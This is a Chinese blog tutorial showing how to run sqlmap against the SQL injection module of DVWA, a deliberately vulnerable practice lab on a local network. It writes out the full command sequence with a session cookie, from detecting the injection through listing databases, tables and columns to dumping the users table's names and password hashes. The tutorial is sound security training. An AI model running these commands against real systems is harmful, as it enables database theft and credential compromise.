美文网首页渗透测试
Sqlmap对DVWA小试牛刀

Sqlmap对DVWA小试牛刀

作者: littlebin404 | 来源:发表于2019-08-27 15:48 被阅读0次

介绍

sqlmap是一个自动化的SQL注入工具,能发现并利用给定的URL的SQL注入漏洞,反正就是非常受欢迎厉害的工具。

DVWA是一个很不错的渗透练手靶机,现用sqlmap对DVWA的sql注入模块进行测试。

准备

设置DVWA级别为low(medium,high都可以,不要设成impossible就行)。

打开dvwa的SQL Injection,地址为:“http://192.168.1.254/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit”,cookie为“security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0”

开始

执行 sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit "

结果是跳转到登录页面,看来是需要带cookie的 。

加上cookie,执行

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie=" security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0"

存在sql注入

获取数据库信息,--dbs为列举数据库信息,--batch为不会询问你输入,全部默认确定:

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch --dbs

查看dvwa数据库所有表,-D指定数据库名称,--tables为查看表信息。

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch -D dvwa --tables

查看users表中列信息,  -T指定数据表 --columns表示列举列信息:

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch -D dvwa –T users --columns

爆出字段值,-C Cnmme:指定列名;  --dump:导出列里面的字段
sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch -D dvwa –T users -C user,password  --dump

至此,拿到DVWA的用户名和密码成功!这些只是sqlmap的基本操作指令,会工具永远是脚本小子,建议师傅们去研究sqlmap的原理,盲注时间注入错误注入……它配备了一个强大的探测引擎,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。原理懂了,哪天工具被强了也不慌。

相关文章

  • Sqlmap对DVWA小试牛刀

    介绍 sqlmap是一个自动化的SQL注入工具,能发现并利用给定的URL的SQL注入漏洞,反正就是非常受欢迎厉害的...

  • sqlmap-1

    sqlmap-sql记录下使用,最近在学习DVWA是个好网站啊==http://43.247.91.228:81/...

  • DVWA + SQLMAP 渗透测试

    Damn Vulnerable Web Application Brute Forcelevel low 手动注入...

  • 通过BurpSuite和sqlmap配合对dvwa进行sql注入

    0x1 工具和环境介绍 dvwa:渗透测试环境BurpSuite:强大的WEB安全测试工具sqlmap:强大的sq...

  • 在DVWA上测试sqlmap

    遇见的问题 1.设置安全等级为low后依然执行impossible找到该文件,将low文件复制到impossibl...

  • SQLMAP注入DVWA high level

    1.SQLi 代码分析 session-input.php: high.php: 一图胜千言: 漏洞利用 查询页面...

  • NJUPT《Web安全》

    1/2 考前复习 复习课笔记考试总结:意料之外的考题有 DVWA 的模板注入、FOFA 搜索引擎、SqlMap 实...

  • Sql注入之sqlmap+dvwa实例演练

    相信很多同学都已经知道了什么是sql注入,也明白为什么会发生sql注入。也可以通过在输入框和url中“手工”注入,...

  • 搭建DVWA漏洞环境

    搭建DVWA漏洞环境 在kali上安装docker docker运行dvwa 初始化dvwa 登录

  • sqlmap使用操作

    安装好sqlmap后,可以用cmd使用sqlmap D: cd sqlmap/sqlmap python sqlm...

网友评论

    本文标题:Sqlmap对DVWA小试牛刀

    本文链接:https://www.haomeiwen.com/subject/ruseectx.html